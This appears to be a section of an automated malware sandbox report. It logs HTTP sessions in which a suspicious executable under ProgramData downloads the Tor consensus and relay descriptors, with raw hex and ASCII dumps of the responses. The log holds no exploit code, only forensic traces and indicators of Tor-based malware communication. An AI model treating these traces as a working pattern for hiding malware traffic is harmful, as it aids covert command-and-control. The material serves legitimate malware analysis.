45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 66 51 47 47 75 6e 68 73 2f 59 54 45 6c 6e 33 62 49 51 46 32 7a 76 35 32 4f 38 36 33 4f 4d 79 38 42 45 53 34 43 68 63 4c 69 63 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 31 3a 30 39 3a 35 33 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 31 45 46 46 20 32 37 30 34 20 44 31 39 42 20 46 34 35 33 20 30 35 42 42 20 43 43 41 35 20 33 45 32 42 20 35 39 41 33 20 44 31 37 41 20 36 45 45 33 0a 75 70 74 69 6d 65 20 38 34 32 35 35 34 0a 62 61 6e 64 77 69 64 74 68 20 31 38 38 37 34 33 36 20 32 33 30 36 38 36 37 20 31 38 38 31 30 30 38 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 35 33 30 36 34 42 45 39 31 38 46 42 41 31 34 37 36 36 43 35 43 41 35 33 35 33 37 35 30 34 30 38 44 30 44 31 35 39 34 35 20 55 70 51 66 31 66 50 6a 61 45 6d 43 75 78 42 58 31 7a 78 46 73 58 45 66 37 32 70 7a 78 76 6c 6f 54 73 4e 5a 57 48 44 45 63 59 55 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 38 44 44 37 48 65 63 66 68 69 46 31 66 7a 4a 33 65 34 6c 36 33 4b 38 61 6d 73 43 52 5a 4f 76 55 66 77 75 54 4b 4a 79 4d 4d 37 30 54 45 43 4a 61 75 39 59 37 43 76 0a 4c 6a 75 51 6a 58 79 37 6a 4a 2b 4b 4c 54 75 52 44 62 56 31 63 67 73 57 6b 55 6e 47 50 47 69 55 57 48 52 79 46 35 31 71 42 72 69 4a 61 68 66 62 6f 72 5a 53 6e 62 35 46 37 31 32 62 4d 79 30 72 0a 42 63 4b 4b 2b 62 64 67 64 61 6d 69 4f 65 46 73 35 54 6e 73 6f 51 5a 35 6b 65 44 62 65 72 7a 63 6c 61 37 5a 52 50 65 48 68 47 2f 63 63 39 7a 56 45 63 53 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 48 4d 72 51 64 4f 64 43 56 6a 4a 68 66 77 66 64 75
                      Data Ascii: router Sepiidae 172.0.47.78 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxtlARW5/v6RJx2MMRt0tP2dcbhwJeZnBi6a/ps3n5WJZS21AQAgBAB9AYa6eGz9hMSWfdshAXbO/nY7zrc4zLwERLgKFwuJyTJYjgMLfv3AadN8mwKyLRGZ4sqEWjt+Z3m+P52HT+UdMhPLCCRdXqNtanb+4ZN45MobILr8OD4XBwpf5G2FQgE=-----END ED25519 CERT-----master-key-ed25519 fQGGunhs/YTEln3bIQF2zv52O863OMy8BES4ChcLickplatform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 11:09:53fingerprint 1EFF 2704 D19B F453 05BB CCA5 3E2B 59A3 D17A 6EE3uptime 842554bandwidth 1887436 2306867 1881008extra-info-digest 53064BE918FBA14766C5CA5353750408D0D15945 UpQf1fPjaEmCuxBX1zxFsXEf72pzxvloTsNZWHDEcYUonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL8DD7HecfhiF1fzJ3e4l63K8amsCRZOvUfwuTKJyMM70TECJau9Y7CvLjuQjXy7jJ+KLTuRDbV1cgsWkUnGPGiUWHRyF51qBriJahfborZSnb5F712bMy0rBcKK+bdgdamiOeFs5TnsoQZ5keDberzcla7ZRPeHhG/cc9zVEcSNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMHMrQdOdCVjJhfwfdu


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      19192.168.2.54972824.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:24.580585003 CET2794OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:25.795445919 CET2796INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:25 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:25 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 36 54 6b 6d 6c 39 35 36 76 32 4b 51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.549700128.31.0.399131C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 00:59:57.579632044 CET6OUTGET /tor/status-vote/current/consensus HTTP/1.0
                      Host: 128.31.0.39
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 00:59:57.680700064 CET7INHTTP/1.0 200 OK
                      Date: Wed, 08 Feb 2023 23:59:57 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Thu, 09 Feb 2023 00:00:00 GMT
                      Vary: X-Or-Diff-From-Consensus
                      Data Raw: 6e 65 74 77 6f 72 6b 2d 73 74 61 74 75 73 2d 76 65 72 73 69 6f 6e 20 33 0a 76 6f 74 65 2d 73 74 61 74 75 73 20 63 6f 6e 73 65 6e 73 75 73 0a 63 6f 6e 73 65 6e 73 75 73 2d 6d 65 74 68 6f 64 20 33 32 0a 76 61 6c 69 64 2d 61 66 74 65 72 20 32 30 32 33 2d 30 32 2d 30 38 20 32 33 3a 30 30 3a 30 30 0a 66 72 65 73 68 2d 75 6e 74 69 6c 20 32 30 32 33 2d 30 32 2d 30 39 20 30 30 3a 30 30 3a 30 30 0a 76 61 6c 69 64 2d 75 6e 74 69 6c 20 32 30 32 33 2d 30 32 2d 30 39 20 30 32 3a 30 30 3a 30 30 0a 76 6f 74 69 6e 67 2d 64 65 6c 61 79 20 33 30 30 20 33 30 30 0a 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 35 2e 31 36 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 2c 30 2e 34 2e 37 2e 31 33 0a 73 65 72 76 65 72 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 35 2e 31 36 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 2c 30 2e 34 2e 37 2e 31 33 0a 6b 6e 6f 77 6e 2d 66 6c 61 67 73 20 41 75 74 68 6f 72 69 74 79 20 42 61 64 45 78 69 74 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 4d 69 64 64 6c 65 4f 6e 6c 79 20 4e 6f 45 64 43 6f 6e 73 65 6e 73 75 73 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 53 74 61 6c 65 44 65 73 63 20 53 79 62 69 6c 20 56 32 44 69 72 20 56 61 6c 69 64 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 4c 69 6e 6b 3d 34 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 70 61 72 61 6d 73 20 43 69 72 63 75 69 74 50 72 69 6f 72 69 74 79 48 61 6c 66 6c 69 66 65 4d 73 65 63 3d 33 30 30 30 30 20 44 6f 53 43 69
                      Data Ascii: network-status-version 3vote-status consensusconsensus-method 32valid-after 2023-02-08 23:00:00fresh-until 2023-02-09 00:00:00valid-until 2023-02-09 02:00:00voting-delay 300 300client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Validrecommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2params CircuitPriorityHalflifeMsec=30000 DoSCi


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      20192.168.2.54972924.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:26.017787933 CET2804OUTGET /tor/server/fp/1f2077bf01caf23f819d4892a89883196aba842a HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:27.374885082 CET2806INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:27 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:27 GMT
                      Data Raw: 72 6f 75 74 65 72 20 70 6c 75 74 6f 61 20 33 37 2e 32 33 35 2e 34 38 2e 32 34 37 20 37 36 35 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 73 64 41 56 33 6c 31 4d 5a 62 72 34 67 4f 75 72 44 42 38 6e 6f 77 30 51 71 35 6a 75 45 6f 79 54 39 38 61 39 57 6d 4b 36 59 42 5a 63 73 4c 41 51 41 67 42 41 44 70 62 43 65 45 0a 74 38 34 65 76 48 35 5a 42 4e 5a 6e 52 6f 54 46 76 49 33 71 74 63 33 77 77 75 51 41 66 2f 65 33 65 59 4c 79 7a 44 4a 4f 4c 59 78 38 56 6d 70 54 6b 65 7a 6e 7a 46 31 76 77 63 51 45 54 75 6a 76 0a 66 36 6c 65 6a 79 59 74 32 66 31 71 59 50 48 46 55 59 67 72 2f 35 78 4e 37 38 62 6e 31 54 31 6b 58 50 68 71 33 39 37 33 2f 32 6f 4c 65 46 72 41 51 45 2f 65 46 6b 79 2f 38 77 63 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 36 57 77 6e 68 4c 66 4f 48 72 78 2b 57 51 54 57 5a 30 61 45 78 62 79 4e 36 72 58 4e 38 4d 4c 6b 41 48 2f 33 74 33 6d 43 38 73 77 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 33 3a 66 38 30 3a 34 38 3a 33 37 3a 32 33 35 3a 34 38 3a 32 34 37 3a 31 5d 3a 37 36 35 34 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 38 3a 30 39 3a 30 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 31 46 32 30 20 37 37 42 46 20 30 31 43 41 20 46 32 33 46 20 38 31 39 44 20 34 38 39 32 20 41 38 39 38 20 38 33 31 39 20 36 41 42 41 20 38 34 32 41 0a 75 70 74 69 6d 65 20 37 31 32 38 32 32 0a 62 61 6e 64 77 69 64 74 68 20 36 35 35 33 36 30 20 31 30 37 33 37 34 31 38 32 34 20 35 37 34 37 38 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 32 37 44 31 46 30 43 37 33 37 30 37 36 45 46 37 36 38 41 43 33 33 37 30 37 42 45 35 34 43 43 41 34 43 31 36 46 37 31 36 20 41 66 70 34 75 2b 49 49 36 6e 78 6c 34 45 53 37 77 72 4a 2f 55 6d 65 4d 39 4a 68 55 79 6e 49 46 68 46 57 31 43 68 68 36 33 37 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 30 66 4b 33 6c 41 51 36 2b 6b 4d 76 4c 53 43 4b 4a 4c 53 52 38 66 74 75 2f 44 31 66 49 68 4a 66 41 4c 6a 56 63 57 51 38 41 31 31 67 55 30 47 36 53 6f 46 39 38 6a 0a 5a 42 62 68 66 39 51 4e 39 39 72 74 41 48 58 6c 79 62 4a 49 74 64 4c 36 78 6b 42 53 34 48 76 5a 76 33 49 57 69 53 53 36 55 4f 78 77 52 64 69 37 72 54 4c 5a 48 63 64 31 59 62 50 49 47 63 4a 65 0a 76 41 6e 79 42 39 5a 5a 63 42 4d 78 57 57 65 50 63 4a 65 45 48 62 36 74 6f 6d 45 79 73 71 62 76 4b 51 43 4c 68 65 63 32 71 52 38 76 58 65 70 48 65 31 6a 62 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e
                      Data Ascii: router plutoa 37.235.48.247 7654 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxsdAV3l1MZbr4gOurDB8now0Qq5juEoyT98a9WmK6YBZcsLAQAgBADpbCeEt84evH5ZBNZnRoTFvI3qtc3wwuQAf/e3eYLyzDJOLYx8VmpTkeznzF1vwcQETujvf6lejyYt2f1qYPHFUYgr/5xN78bn1T1kXPhq3973/2oLeFrAQE/eFky/8wc=-----END ED25519 CERT-----master-key-ed25519 6WwnhLfOHrx+WQTWZ0aExbyN6rXN8MLkAH/3t3mC8swor-address [2a03:f80:48:37:235:48:247:1]:7654platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 18:09:06fingerprint 1F20 77BF 01CA F23F 819D 4892 A898 8319 6ABA 842Auptime 712822bandwidth 655360 1073741824 5747876extra-info-digest 27D1F0C737076EF768AC33707BE54CCA4C16F716 Afp4u+II6nxl4ES7wrJ/UmeM9JhUynIFhFW1Chh6378onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAK0fK3lAQ6+kMvLSCKJLSR8ftu/D1fIhJfALjVcWQ8A11gU0G6SoF98jZBbhf9QN99rtAHXlybJItdL6xkBS4HvZv3IWiSS6UOxwRdi7rTLZHcd1YbPIGcJevAnyB9ZZcBMxWWePcJeEHb6tomEysqbvKQCLhec2qR8vXepHe1jbAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      21192.168.2.54973124.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:37.859992027 CET2820OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:40.097600937 CET2821INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:39 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:39 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 